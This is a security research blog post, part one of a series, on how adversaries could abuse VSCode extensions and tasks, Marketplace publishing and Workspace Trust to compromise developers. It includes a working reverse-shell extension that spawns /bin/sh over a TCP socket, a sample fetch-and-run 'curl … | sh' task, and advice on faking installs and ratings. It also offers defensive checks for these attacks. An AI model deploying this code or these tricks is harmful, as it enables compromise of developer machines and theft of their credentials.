Abusing VSCode: From Malicious Extensions to Stolen Credentials (Part 1)

- Abusing VSCode Features

- Attack Paths for Remote VSCode Compromise

- Creating a Malicious Extension

- Publishing onto VSCode Marketplace

- Installing the Malicious Extension

- Attack Path for Stealing Credentials

- Conclusion

Over the past several years, there has been a mantra of “shift left” to push security to the beginning of the development lifecycle. Although this is a great approach that lets developers focus on functionality whilst receiving security guidance, it comes at a cost: the developer's environment becomes a powerful, multi-functional toolbox that is integrated with source code repositories, CI/CD pipelines, cloud providers and other services.

One of the most popular tools in the development community is Visual Studio Code (VSCode). The extensibility of VSCode allows developers to customize their development environment to suit their needs. This extensibility also opens up the opportunity for an adversary to abuse VSCode and leverage its functionality to run malicious code. VSCode has extensions for GitHub, GitLab, BitBucket, Docker, Kubernetes, Terraform Cloud and many of the popular cloud providers. A compromise of VSCode could lead to an adversary gaining access to these services.

Abusing VSCode Features

To leverage VSCode to access other enterprise services, an adversary must compromise VSCode first. One route is to obtain local access to the developer’s environment, while another is to remotely compromise VSCode. A local compromise is a well-trodden path and can be achieved through various means, such as phishing, social engineering, or physical access. A remote compromise is less understood and potentially has a higher impact because it can affect a larger number of developers.

Reviewing the documentation for VSCode, a few key features stand out as being open to abuse by an adversary:

The majority of these features are only accessible via authentication, whether locally for Port Forwarding and Live Share or in remote developer environments, which require the developer’s SSH key. The most accessible features are the Extensions, Tasks, and the VSCode Project itself.

Attack Paths for Remote VSCode Compromise

To remotely compromise VSCode, an adversary either attacks the underlying source code of the IDE via a supply chain attack or explores the avenue of tricking a developer into installing malicious code.

- An adversary compromises the VSCode open source project or a VSCode dependency to introduce malicious code

- An adversary clones the VSCode repository, introduces malicious code and attempts to trick users into downloading the compromised version

- An adversary creates a malicious extension and hosts it in the VSCode marketplace

- An adversary creates a malicious task and commits it to a public repository used by the developer

Of these attack paths, attempting to affect the VSCode project itself is challenging, depending on the quality of gates and security practices in place. The most likely path is to trick a developer into installing a malicious extension or to have a developer download a repository with a malicious task. A task requires an adversary to have access to a repository (either public or private) to implant the malicious code, which depends on the adversary establishing trust with the repository owners and on the robustness of their code review process. By contrast, all an adversary needs to host a malicious extension is a valid Microsoft account with which to publish it to the VSCode extension marketplace.
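To make the task route more concrete, here is a minimal sketch of how a reviewer might flag tasks that are set to run as soon as a folder is opened. It relies on the `runOptions.runOn: "folderOpen"` setting from the VSCode tasks schema. The `findAutoRunTasks` helper, the interfaces and the sample data (including the `example.invalid` URL) are our own illustrative assumptions, and the input is assumed to be already parsed, since a real `tasks.json` may contain comments that plain `JSON.parse` rejects.

```typescript
// Hypothetical reviewer helper: flags tasks in a parsed .vscode/tasks.json
// that are configured to run automatically when the folder is opened.

interface TaskDefinition {
  label?: string;
  type?: string;
  command?: string;
  runOptions?: { runOn?: string };
}

interface TasksFile {
  version?: string;
  tasks?: TaskDefinition[];
}

// Returns every task whose runOptions.runOn is "folderOpen".
function findAutoRunTasks(tasksFile: TasksFile): TaskDefinition[] {
  return (tasksFile.tasks ?? []).filter(
    (task) => task.runOptions?.runOn === "folderOpen"
  );
}

// Illustrative input only; the URL is a placeholder, not a real host.
const sampleTasks: TasksFile = {
  version: "2.0.0",
  tasks: [
    { label: "build", type: "shell", command: "npm run build" },
    {
      label: "setup",
      type: "shell",
      command: "curl https://example.invalid/setup.sh | sh",
      runOptions: { runOn: "folderOpen" },
    },
  ],
};

const flaggedTasks = findAutoRunTasks(sampleTasks);
for (const task of flaggedTasks) {
  console.log(`auto-run task: ${task.label} -> ${task.command}`);
}
```

A check like this only narrows down what to read; any task in a repository can still be malicious if a developer runs it manually.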

Creating a Malicious Extension

VSCode extensions are written in JavaScript or TypeScript and can be used for various purposes to extend the functionality of the IDE. For a malicious extension, the vscode.commands API (for example, registerCommand and executeCommand) can be used to run code in the context of VSCode, and because extensions run in a Node.js process, they can also call Node.js modules such as net and child_process. The VSCode API also exposes a wide range of information, such as the environment the editor runs in and the extensions installed.

At this point it is a matter of what the adversary wants to achieve with the malicious extension, but it is worth noting that any code executed will run with the same permissions as the user running the extension. This means the extension can access any data or services that the user has access to.

It is relatively easy to create a VSCode extension and to create malicious code. Below is rudimentary example code which creates a reverse shell to a remote server:

    import * as vscode from 'vscode';
    import * as net from 'net';
    import * as cp from 'child_process';

    export function activate(context: vscode.ExtensionContext) {
        // The handler only runs when the 'rs' command is invoked
        const disposable = vscode.commands.registerCommand('rs', () => {
            clientConnection();
            console.log('client connection started');
        });
        context.subscriptions.push(disposable);
    }

    // This method is called when your extension is deactivated
    export function deactivate() {}

    function clientConnection() {
        // Spawn a shell and wire its streams to a TCP socket
        const sh = cp.spawn('/bin/sh', []);
        const client = new net.Socket();
        client.connect(8080, 'localhost', () => {
            client.pipe(sh.stdin);
            sh.stdout.pipe(client);
            sh.stderr.pipe(client);
        });
        // Stop the shell when the connection closes
        client.on('close', () => {
            sh.kill();
        });
    }
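The example above only does anything once the `rs` command is invoked. When an extension's code first runs is governed by the `activationEvents` field in its `package.json`, so one thing a reviewer might look at is whether an extension asks to be activated at startup. The sketch below is a rough illustration under our own assumptions: `eagerActivationEvents`, the `ExtensionManifest` shape and the sample manifests are hypothetical, and only the `*` and `onStartupFinished` events are treated as eager. It also ignores web extensions, which use a `browser` entry point rather than `main`.

```typescript
// Hypothetical manifest check: reports activation events that cause an
// extension's code to run at startup rather than on a specific user action.

interface ExtensionManifest {
  name: string;
  publisher: string;
  main?: string;
  activationEvents?: string[];
}

// Assumption: these two events are the ones we treat as "eager".
const EAGER_EVENTS = new Set<string>(["*", "onStartupFinished"]);

function eagerActivationEvents(manifest: ExtensionManifest): string[] {
  // Without an entry point there is no extension code to activate.
  if (!manifest.main) {
    return [];
  }
  return (manifest.activationEvents ?? []).filter((event) =>
    EAGER_EVENTS.has(event)
  );
}

// Illustrative manifests only; names and publishers are made up.
const commandOnly: ExtensionManifest = {
  name: "sample-command",
  publisher: "example-publisher",
  main: "./out/extension.js",
  activationEvents: ["onCommand:rs"],
};

const startsOnLaunch: ExtensionManifest = {
  name: "sample-startup",
  publisher: "example-publisher",
  main: "./out/extension.js",
  activationEvents: ["onStartupFinished", "onCommand:rs"],
};

for (const manifest of [commandOnly, startsOnLaunch]) {
  const eager = eagerActivationEvents(manifest);
  console.log(`${manifest.publisher}.${manifest.name}: ${eager.join(", ") || "no eager events"}`);
}
```

Eager activation is common in legitimate extensions too, so this is a prompt for closer reading rather than a verdict.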

So what can an adversary do with a malicious extension?

- Download and execute malicious software (e.g. cryptominer, ransomware)

- Install persistence on the local machine

- Establish a Command and Control (C2) channel

- Enumerate and exfiltrate sensitive data

One of the key challenges for an adversary establishing a C2 channel is to avoid detection from enterprise network security controls such as firewalls, network intrusion detection systems and domain filtering on a reverse proxy. As we are targeting VSCode, there is a high likelihood that the source code repositories are accessible from the developer’s device and that GitHub or GitLab can be used as a trusted service to interact with. There are several examples of adversaries using GitHub to establish a C2 channel but the key challenge is to continually avoid detection on the local device.

What about enumerating and exfiltrating sensitive data?

Many VSCode extensions authenticate with remote services to allow developers ease of access and not break their current task flow. The extensions’ credentials are stored locally on the developer’s device, which an adversary could target with a malicious extension.

For adversaries to be successful in this attack path, they must overcome two primary security controls. The first is to publish the malicious code onto the VSCode marketplace without the extension being flagged by the VSCode team. The second is to trick a developer into installing the malicious extension and to get past Workspace Trust.

Publishing onto VSCode Marketplace

To publish onto the VSCode marketplace, an adversary must have a valid Microsoft account and follow the publishing guide. This essentially involves:

- As Visual Studio Code uses Azure DevOps for its Marketplace services, the first step is to create a personal access token in Azure DevOps.

- The next step is to create a publisher account on the Visual Studio Code Marketplace.

- Finally, the extension can be published to the marketplace using the vsce command line tool.

But an adversary is more concerned with the review process. According to the VSCode documentation, the review process involves the following:

The Marketplace runs a virus scan on each extension package that’s published to ensure its safety. The virus scan is run for each new extension and for each extension update. Until the scan is all clear, the extension won’t be published in the Marketplace for public usage.

The Marketplace also prevents extension authors from name-squatting on official publishers such as Microsoft and RedHat.

If a malicious extension is reported and verified, or a vulnerability is found in an extension dependency:

- The extension is removed from the Marketplace.

- The extension is added to a kill list so that if installed, it will be automatically uninstalled by VS Code.

The review is currently limited to a virus scan and name-squatting prevention, so it is quite feasible to publish a malicious extension that avoids detection. Check Point discovered several such extensions in May 2023.
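Because the name-squatting protection described above covers official publishers, a team might want its own check for names that sit suspiciously close to extensions it already uses. The following is a minimal sketch using Levenshtein edit distance. The `findLookalikes` helper, the distance threshold of 2 and the extension names are all assumptions made for illustration; this is not how the Marketplace itself detects name-squatting.

```typescript
// Classic Levenshtein edit distance using two rolling rows.
function editDistance(a: string, b: string): number {
  let prev: number[] = [];
  for (let j = 0; j <= b.length; j++) {
    prev.push(j);
  }
  for (let i = 1; i <= a.length; i++) {
    const curr: number[] = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a.charAt(i - 1) === b.charAt(j - 1) ? 0 : 1;
      curr.push(
        Math.min(
          prev[j] + 1, // deletion
          curr[j - 1] + 1, // insertion
          prev[j - 1] + cost // substitution or match
        )
      );
    }
    prev = curr;
  }
  return prev[b.length];
}

// Hypothetical helper: returns known names that are close to, but not the
// same as, the candidate name. The threshold is an arbitrary assumption.
function findLookalikes(
  candidate: string,
  knownNames: string[],
  maxDistance = 2
): string[] {
  const needle = candidate.toLowerCase();
  return knownNames.filter((known) => {
    const distance = editDistance(needle, known.toLowerCase());
    return distance > 0 && distance <= maxDistance;
  });
}

// Illustrative names only; these are not real extensions.
const trustedNames = ["example-formatter", "example-linter"];
console.log(findLookalikes("example-formater", trustedNames));
```

Edit distance misses other tricks, such as a familiar name published under an unfamiliar publisher, so it is best treated as one signal among several.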

Installing the Malicious Extension

To trick the developer into installing the malicious extension, an adversary has a few options, ranging from open source intelligence (OSINT) gathering to social engineering. From a marketplace perspective, however, the developer has two main trust signals: the number of installations and the rating of the extension. Both can be manipulated by the adversary to increase the likelihood of a developer installing the malicious extension. It is feasible for an adversary to create a number of fake accounts to install and rate the extension, increasing its visibility and “trust”.

During installation, though, the adversary may hit a hurdle: Workspace Trust. Workspace Trust disables features such as Tasks, Debugging, certain settings and extensions to reduce risk when opening untrusted code. For a malicious extension, Restricted Mode attempts to prevent automatic code execution by disabling or limiting its operation.

But according to the VSCode documentation:

Workspace Trust can not prevent a malicious extension from executing code and ignoring Restricted Mode. You should only install and run extensions that come from a well-known publisher that you trust.
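One way to see why is that, based on our reading of the Workspace Trust extension guide, an extension declares its own Restricted Mode support through the `capabilities.untrustedWorkspaces.supported` field in its `package.json`. The sketch below models that declaration. The `codeRunsInRestrictedMode` helper and the sample manifests are hypothetical, and the rule that an extension with no declaration is disabled is our assumption about the default behaviour; user-level overrides are not modelled.

```typescript
// Hypothetical model of how an extension's own manifest declaration decides
// whether its code is allowed to run in Restricted Mode.

type UntrustedSupport = true | false | "limited";

interface TrustManifest {
  name: string;
  main?: string;
  capabilities?: {
    untrustedWorkspaces?: { supported: UntrustedSupport };
  };
}

function codeRunsInRestrictedMode(manifest: TrustManifest): boolean {
  // No entry point means there is no extension code to run at all.
  if (!manifest.main) {
    return false;
  }
  const supported = manifest.capabilities?.untrustedWorkspaces?.supported;
  // Assumption: a missing declaration means the extension is disabled.
  return supported === true || supported === "limited";
}

// Illustrative manifests only.
const undeclared: TrustManifest = {
  name: "undeclared-extension",
  main: "./out/extension.js",
};

const selfDeclared: TrustManifest = {
  name: "self-declared-extension",
  main: "./out/extension.js",
  capabilities: { untrustedWorkspaces: { supported: true } },
};

console.log(codeRunsInRestrictedMode(undeclared));
console.log(codeRunsInRestrictedMode(selfDeclared));
```

The point of the sketch is that the declaration is written by the extension author, so a malicious author can simply claim full support.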

So even with Workspace Trust in place, the malicious extension can still execute code. The only way to truly prevent it is to have an official allowlist of extensions that can be installed. It is worth noting, however, that developers can download and install extensions locally via a .vsix file, so even with a restricted list of extensions it is still possible that a developer will install a malicious extension.
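As a rough illustration of the allowlist idea, the sketch below compares a list of installed extension IDs (for example, the output of `code --list-extensions`, one `publisher.name` ID per line) against an approved list. The `findUnapprovedExtensions` helper, the lowercase normalisation and the `example-publisher.unknown-tool` ID are our own assumptions; this audits what is already installed and does not block installation.

```typescript
// Normalise an extension ID so comparisons ignore case and stray whitespace.
// Assumption: IDs of the form publisher.name are compared case-insensitively.
function normalizeId(id: string): string {
  return id.trim().toLowerCase();
}

// Hypothetical audit helper: returns installed IDs missing from the allowlist.
function findUnapprovedExtensions(
  installed: string[],
  allowlist: string[]
): string[] {
  const approved = new Set(allowlist.map(normalizeId));
  return installed
    .map(normalizeId)
    .filter((id) => id.length > 0 && !approved.has(id));
}

// Example input shaped like the text printed by `code --list-extensions`.
const listOutput = [
  "ms-python.python",
  "RedHat.vscode-yaml",
  "example-publisher.unknown-tool",
  "",
].join("\n");

const approvedIds = ["ms-python.python", "redhat.vscode-yaml"];

const unapproved = findUnapprovedExtensions(listOutput.split("\n"), approvedIds);
console.log(unapproved);
```

Running an audit like this on a schedule would also surface extensions that were sideloaded from a .vsix file, since it looks at what is installed rather than where it came from.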

Attack Path for Stealing Credentials

With the malicious extension installed, our ultimate goal is to steal credentials from the developer’s environment so we can exfiltrate them to access remote services such as GitHub, Docker, Cloud Providers and other services.



The attack path is illustrated below:

You may notice that to steal the credentials, the adversary requires access to the underlying keychain/keyring and the VSCode local database file. To understand why, we need to build out a proof of concept malicious extension to steal credentials. In Part 2 of this post, we will explore how to do this and how the lack of sandboxing in VSCode allows an adversary to steal credentials from any authenticated extension.

Conclusion

In this post, we have explored the attack paths for remotely compromising Visual Studio Code. We have identified the key features of VSCode which can be abused by an adversary and the most likely route to compromise. We have also explored the steps an adversary must take to publish a malicious extension onto the VSCode marketplace and the challenges they face in tricking a developer into installing the extension.